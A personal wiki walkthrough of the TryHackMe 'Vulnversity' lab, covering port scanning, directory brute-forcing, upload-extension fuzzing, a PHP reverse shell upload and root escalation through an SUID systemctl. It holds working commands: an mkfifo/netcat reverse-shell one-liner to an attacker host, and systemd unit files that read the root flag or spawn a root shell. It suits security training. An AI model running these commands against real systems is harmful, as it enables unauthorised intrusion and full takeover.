====== TRY HACK ME ======

  * [[https://tryhackme.com/ | TryHackMe]]: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers. 

====== Vulnversity ======

Write-Ups: [[https://n0w4n.nl/vulnversity/ | n0w4n]]

===== Port/Version Scan =====

Mine:

<code>nmap -vv -p- -sV -A [IP]</code>

[[https://n0w4n.nl/vulnversity/ | n0w4n's]]: 

<code>nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138</code>

===== GoBuster (dirs) =====

Brute-force directories & files, DNS subdomains, and virtual host names.

<code>
    apt-get install gobuster
    wordlists under /usr/share/wordlists
    Syntax: gobuster dir -u http://<ip>:3333 -w <word list location>
    -e                Print the full URLs in your console
    -u                The target URL
    -w                Path to your wordlist
    -U and -P         Username and Password for Basic Auth
    -p <x>            Proxy to use for requests
    -c <http cookies> Specify a cookie for simulating your auth
</code>

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Used DirSearch

<code>dirsearch -u http://10.10.207.138:3333 -e php -x 400,404</code>

===== Burp: Intruder =====

**Burp Suite Intruder:** Fuzz the ''/internal/'' directory to see what kinds of file extensions it will allow you to upload.

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be ''file%2ephp'', which won’t work.
  * I did that... and it didn't work.

===== Reverse Shell =====

Obtain an exploit reverse shell to upload: [[https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php | pentestmonkey]]

  * You have to rename it .phtml to upload it.
  * Upload it.
  * Start a listener on your attack machine:

<code>
nc -lvnp 1234

# -l listener
# -v verbose
# -n numeric-only IPs, no DNS
# -p port (local port number)
</code> 

  * Then execute the .phtml file on the target machine: 

<code>http:[IP]:3333/internal/uploads</code>

===== Privilege Escalation =====

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: For a lot of CTFs, a good find are files with the SUID bit set.

<code>
find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null

# -l long listing format
# -d list directory names, not contents
</code>

**Or use PEASS:** [[https://pentesttools.net/peass-privilege-escalation-awesome-scripts-suite/ | Privilege]]Escalation Awesom Scripts Suite
  * [[https://github.com/carlospolop/PEASS-ng/releases/tag/20220918 | Download]]
  * [[https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS | Linpeas]]:  Linux local Privilege Escalation Awesome Script (.sh)

**Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]

===== Exploit =====

[[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.

  * First we create a variable which holds a unique file (on target machine). 

<code>eop=$(mktemp).service</code>

  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''.

<code>
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop
</code>

  * And finally we use the /bin/systemctl program to enable the unit file.

<code>
/bin/systemctl link $eop
# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

/bin/systemctl enable --now $eop
# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
</code>

  * Find it:

<code>ls -lah /tmp</code>

===== Alternative Exploit =====

**To get a reverse root shell:**

**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]).

<code>
# nc (openbsd):
rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
</code>

  * Create your unit file:

<code>
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
[Install]
WantedBy=multi-user.target' > gk.service
</code>

  * Open a listener on your attack machine:

<code>nc -lvnp 7777</code>

  * Link and start the service:

<code>
/bin/systemctl link /tmp/gk.service         # need the full path
/bin/systemctl enable --now /tmp/gk.service
</code>

Done.

----